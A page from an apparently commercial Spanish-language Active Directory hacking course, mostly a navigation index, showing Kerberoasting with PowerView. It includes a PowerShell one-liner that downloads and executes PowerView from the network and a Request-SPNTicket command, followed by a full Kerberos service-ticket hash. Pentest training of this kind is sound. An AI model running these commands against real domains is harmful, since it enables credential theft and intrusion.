Hacking en Active Directory - [CPAD-100]
Comprar cursoYouTubeTwitterLinkedIn
  • La Biblia del Hacking en ACTIVE DIRECTORY
    • ADVERTENCIA
    • Conoce a tu academia
    • Conoce a tu instructor
    • Aprende con nuestro curso
      • ¿Que Significa CPAD-100?
  • Introducción a Directorio Activo – (AD)
    • Fundamentos de AD
    • Componentes importantes de un Active Directory
    • Principales conceptos de un Directorio Activo
      • Diferencias entre GPO y ACL
    • ¿Por qué los atacantes van tras los controladores de dominio?
      • Ransomware en AD
    • Introduccion a Kerberos
      • Capa de transporte
      • Agentes
      • Claves de cifrado
      • Tickets
      • Privilege Attribute Certificate (PAC)
      • Mensajes
    • Proceso de autenticación en Kerberos
      • Kerberos Explicado con Parques y Atracciones
    • ¿Como funciona Kerberos?
    • S4U (Service for User)
    • Usuarios y grupo por defectos en AD
    • Biblia de comandos para el CPAD
  • Fundamentos Ofensivos
    • Introduccion al Curso Profesional de Pentesting para Juniors - [CPPJ]
    • ¿Qué es un Red Team?
      • Assume breach
    • ¿Qué es un Pentesting?
    • Instalacion de Kali Linux
      • Utilizando IP publica para auditorias reales
    • Transferencias de archivos
    • Cyber Kill Chain
    • MITRE
      • Ejemplo teorico
  • Enumeracion Externa
    • Credenciales expuestas
    • La importancia de la enumeracion en un red team
    • Reconocimiento y Recopilacion
    • Activos de informacion publicos
      • DNS records
      • Redes sociales
  • Vectores de ataque fisico
    • Physical Red Team Operations
    • Que es la intrusion fisica
      • Vectores de ataque
    • Rubber Ducky
    • Stuxnet
    • Introduccion a Flipper Zero
      • BadUSB
  • Introduccion Al Hacking Web
    • Tu primer Red Team contra Active Directory
      • Objetivos
      • CyberKillChain en CPAD
    • La importancia del hacking web en un red team contra AD
    • Curso gratuito con los labs de PortSwigger
    • Enumeracion sobre un servidor web desplegado en IIS
    • Inyeccion de comandos desde un formulario web
  • Post-explotacion en windows
    • Fundamentos de la Enumeracion local en un Windows
    • Enumeracion basica desde una WebShell
    • Fundamentos de escalacion de privilegios en Windows
      • ¿Que son altos privilegios en windows?
      • ¿Que son bajos privilegios en windows?
      • Identificando mis privilegios actuales
      • Tokens de acceso en Windows
      • Niveles de integridad en procesos de Windows
    • Privilegios en Windows
    • Abusando de los privilegios SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege
    • Introduccion al Curso Profesional de Pentesting contra Windows - [CPPW]
    • NT AUTHORITY\SYSTEM
    • Reverse Shell en PowerShell Indetectable
      • Introduccion al Curso RedTeam Ops Developer Senior
    • Migracion de WebShell a BurpSuite
    • Migracion de WebShell a Reverse Shell via PowerShell
    • Diferencia entre una WebShell y Reverse Shell
    • Introducción a PowerUp
    • Introducción a WinPEAS
  • Persistencia en Windows Local
    • Introduccion a la post-explotación y persistencia en Windows
    • Creacion de usuarios con net
    • Qué es Mimikatz
      • LSASS
      • Extraccion de credenciales con Mimikatz con binario
      • Extraccion de credenciales con Mimikatz con PowerShell
      • Resolucion de errores con Mimikatz
      • Mimikatz en la actualidad
  • Enumeracion en AD
    • Identificando un Domain Controller (DC) en red
    • ActiveDirectoryRights en el Contexto de Red Team
    • Enumeracion manual con GUI
    • Enumeracion con PowerShell ofensivo
      • Guia de comandos de PowerView.ps1
        • Enumeracion de usuarios
        • Enumeracion de Grupos
        • Enumeracion de Computadores
        • Enumeracion de GPO
        • Enumeracion de ACL
      • Utilizando ADPeas
    • Enumeracion con AD Module DLL
    • Enumeracion con BloodHound
    • Enumeracion con klist
    • Security Identifiers (SIDs)
    • Distinguished Name o DN
  • Vulnerabilidades y ataques en AD
    • Fundamentos de vulnerabilidades en AD
    • Password Spraying
      • La importancia de generar contraseñas personalizadas
      • Kerbrute
    • Relay Attacks
      • ¿Que es NTLM?
      • Utilizando impacket-ntlmrelayx
        • Análisis de impacket-ntlmrelayx
    • Credenciales en descripcion
      • Utilizando CrackMapExec
      • Utilizando BloodHound
    • Kerberoasting
      • Utilizando BloodHound
      • Utilizando Rubeus
      • Utilizando Impacket-GetUserSPNs
      • Utilizando CrackMapExec
      • Utilizando PowerView
    • ASREProastable
      • Utilizando Rubeus
      • Utilizando CrackMapExec
      • Utilizando Impacket-GetNPUsers
      • CVE-2022-33679
    • Unconstrained Delegation
      • TrustedToAuthForDelegation vs TrustedForDelegation
    • Constrained Delegation
      • Usuario
      • Computadora
        • Utilizando Rubeus
    • DnsAdmins
      • Utilizando PowerView.ps1
      • Utilizando NET
      • Cargando una dll maliciosa con dnscmd
      • Generando una DLL maliciosa
    • LAPS Reader
    • (RBCD) Resource-based constrained
    • Abuso de ACL
      • Enumeracion con PowerView
      • Tipos de permisos
        • Tabla de Referencia de Permisos y Derechos en Active Directory
      • Access Control Entry (ACE)
      • WriteDacl sobre Computador
      • GenericAll sobre Grupo
      • GenericAll sobre usuario
      • GenericWrite sobre computador
    • Abuso de GPO
      • ¿Qué es SysVol?
      • Utilizando PowerView
      • Solicitando TGT para el usuario gpowrite.user
      • Utilizando SharpGPOAbuse
      • Forzando la actualizacion de GPO
    • Zerologon - CVE-2020-1472
  • Movimiento lateral
    • Fundamentos de movimiento lateral en AD
    • Impersonation
    • Pass-the-Hash (PtH)
      • Identificando servicios para realizar el PTH
      • Utilizando Evil-WinRm
      • Utilizando impacket-psexec
      • Utilizando RDP
  • Persistencia y post-explotacion en AD
    • Fundamentos de persistencia y la post-explotación en AD
    • DCSync
      • Extracción de Credenciales del Dominio de Active Directory
      • Utilizando CrackMapExec
      • Utilizando Mimikatz
      • Utilizando Impacket-secretsdump
    • Creacion de usuarios en el dominio con net
    • Silver Ticket
      • Service Principal Name (SPN)
      • Silver Ticket para CIFS
    • Golden Ticket
      • Diferencias entre Silver Ticket y Golden Ticket
      • ¿Que es KRBTGT?
      • Variantes del Golden Ticket
        • Golden Ticket tradicional utilizando Mimikatz
        • Golden Ticket Inter-realm TGT
    • Pass The Ticket
      • PTT en Linux
      • PTT en Windows
    • Diamond Ticket
    • Bosques y relaciones de confianza
      • TrustAttributes y TrustType
      • Enumeracion utilizando ADPeas.ps1
      • Enumeracion utilizando nltest
      • Enumeracion utilizando .NET Framework
      • Enumeracion utilizando con PowerView
      • Enumerando con SharpHound
  • Introduccion a la evasion de defensas
    • Fundamentos de evasión de defensas
    • Introduccion a UAC
      • Bypass UAC utilizando FodhelperUACBypass.ps1
      • Bypass utilizando Kerberos y SMBExec
    • Evasión de antivirus
      • Utilizando HoaxShell
    • Introduccion a LOLBAS
    • AMSI para Hackers
    • Utilizando IP publicas y dominios confiables para el almacenamiento de herramientas
    • Codificando tus comandos de PowerShell en base64
      • Transferencia de archivos con base64
    • Política de ejecución de PowerShell
    • Introduccion a Sysinternals
    • Introduccion a AppLocker
    • Apagando defensas basicas
  • Introduccion a ataques modernos en AD
    • Fundamentos de Azure Active Directory
    • DCSync utilizando MSOL
    • Introduccion al Curso de Pentesting Contra Azure - [CPAZ]
  • Introduccion al Blue Team en Active Directory
    • Blue Team y SOC
    • Introduccion al Curso Profesional de Blue Team - [CPBLT]
    • Introduccion a Sysmon
      • Deteccion de comportamiento anomalo con ElasticSearch
  • Muchas Gracias
    • 🛡️ ¡Muchísimas Gracias por Participar! 🛡️
    • Importante
Con tecnología de GitBook
En esta página

¿Te fue útil?

  1. Vulnerabilidades y ataques en AD
  2. Kerberoasting

Utilizando PowerView

AnteriorUtilizando CrackMapExecSiguienteASREProastable

Última actualización hace 9 meses

¿Te fue útil?

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

Para realizar este ataque utilizando PowerView simplemente ejecutamos los siguientes comandos:

PS C:\Users\admin> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');
PS C:\Users\admin> Request-SPNTicket -SPN "MSSQL/sql.spartancybersec.corp"

SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : MSSQL/sql.spartancybersec.corp
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQL/sql.spartancybersec.corp*$6B69ADEDEAC5550DB12678F83A6F78CF$90
                       F6A8A460C9696A2FD352F4BB616DABF89CE6D552D6BEE9435C6F1471C56F9E1E891509B04DB12949BF111020F68D8E16
                       1925AE7384A5FDB646D4C8641F8819CAD956F7D49850221947F25D934B9106F7E0B633434F71BFFBBEB8692F360F4372
                       AD3FE0DF92E1BFAFCB2C9504F474C352A4934B2FCFBDE554704D3E3724BAE968AFF77E3B1222DF4A8593667D95B62620
                       959CE22B390D9E7B84A945DC9AF5910CD45CE6F7335F8A7E4C616D4B9A31647120E4A128EEA1258F25FFCA4A1B6AB8B5
                       24BF20A03A2CBDAC5B2B9A008AEA5D723073E012B866502E0D557D6485E20AFF057CF7A85CEC6AD955B4CBFF910D4AEE
                       93E4D7BABE1DF37758194B757AB62699DA5384C721AC8DBCCC11C9AB4EC68BC7133607246A610AECEDA5CB8BB457DA90
                       268312126EBB8B8CFAC84D12B71DD6F0158C699232AE6023257D44A48CEB9C18FAEC127C3D1432BEDF461C9AB4F16204
                       FFA7CF975B00A38F904837A24BDB64FA0496562D8EEC7C869B7B8270AABCC0B03935A9EAAF13DD5115A0D7E28E2B7ED0
                       AC7C67AFD5DB041F92905CF5C0F0E8058241E443FC23E4BC048D10ACB909D87E987EBDB53A5279A89389B4B512ED3042
                       53BEB7DCD8615D21EAFBA76BCAA3C6FE42204D5A4678A32606ED2E6EF42BF60AD2154A5CA5C195493C4568AAB1CC918D
                       BF3D1FD7DF08A56F04DCA167B9EC7173CC753C8254A1FFA44BAB389ED827BA406B909D301EFCDF00E17050C8B5BAA345
                       F961F065121A903886A607BE931E34F3AD8339CA64AD3C36DB697EC9DBE561B69BA1A34793D8EA19CDA2C0FFE7F4BB40
                       57415C3680BBF62723F72568EDC7F6B1CB5EC7E8362DD1B26905EB347FD3C22163441C1BF0CCE92328BC4FCCD5E267A8
                       FBAE9AA16B6B371881851407AD5D00A1BE0CA0D5B91822725D3F6D5EB8F969F4380DB7A60D4B57A6326460AC79EF98FD
                       58A05FED5E6A139953188A060F0B5E222AC0FA084BA120E6421C20A83EC89E48B6057500374CA27C0880529196B42DD6
                       AD381E5E401B6ABAD68B4FB37B64C35B75F3A6C09097840C704AE119E4B37139649BAC11BC77316B1101A4AE3E2D3F78
                       169F0B2AD34A1C82A54E8F400BE87932A462A80FFB2F87C7F0815E36603BAFBC4AEDF85B0E32A6DB7EFAB9A7244B7E4E
                       DA8AE53777E0A334789FB426EBC8B4C6F35F029B7CAFD87359ED2F933E1936EE9287359A87A8193BC7BD949048267AF5
                       B24DAD424D22A5EF30F364C2A7BF1459830894405524FD7D397F6A9B310A698817712DC22E8A1F43410B935C4C948531
                       D1155FDB2D5098A22909283D2CA2A5FD803F245D775AD1B02B0A1D4C4A385BCFDB2CBD87FFCF72523BD1AFDE2DB06BA9
                       5D8CD6038BD99BAFEFB50560157A1606FEA5881087A29A966D83813EDE4B9B862D9F3B11BA8540BCA0BD0FDF2D3D89E4
                       7D91794725DE9FB38817006DF425F074EAE6D2571CD35CE5CB9F32E4AD43953EC4FDF21758D8AA862115D78652F22D81
                       F28791907B7A2C644AB46B7603FC8758498672830EF3E28592BC9070CEB31B5EBC6A6358A3DDB13A2D75DB3954223B16
                       8111163014BC22607DC66E0FB904D96B2681ADB1D4DE1B6D2529EC45AA65438862300B8AF189513868E35170E22F2A46
                       73E9F4444302464D1EC9E2DB2281B625E0E52FF1B5069BC4D81E689131C5CDD4C55C073CB41FB136ACBB859FD0314633
                       B3B221
https://wa.link/ej3kiu